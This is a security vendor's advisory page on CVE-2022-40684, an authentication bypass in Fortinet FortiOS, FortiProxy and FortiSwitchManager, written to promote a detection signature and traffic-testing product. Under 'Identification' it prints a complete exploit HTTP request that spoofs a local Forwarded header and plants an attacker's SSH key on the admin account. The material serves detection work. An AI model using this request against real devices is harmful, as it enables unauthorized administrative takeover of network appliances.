top of page

FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass (CVE-2022-40684)



Application / Appliance Details

FortiOS is the Fortinet’s proprietary Operation System which is utilized across multiple product lines. FortiProxy is a secure web proxy that protects employees against internet-borne attacks by incorporating multiple detection techniques. FortiSwitch Manager is an on-premise management platform for the FortiSwitch product.


Vulnerability

Fortinet FortiOS, FortiProxy and FortiSwitchManager could allow a remote attacker to bypass security restrictions using an alternate path or channel vulnerability.


Identification

By sending specially crafted HTTP or HTTPS requests, an attacker could exploit this vulnerability to log into unpatched devices and perform operations on the administrative interface.

PUT /api/v2/cmdb/system/admin/admin
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
 
{ "ssh-public-key1": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58=dev@devs-MacBook-Pro.local" }

Detection

By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to bypass security.


Coverage

Idappcom has created signature 8023189 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Комментарии


bottom of page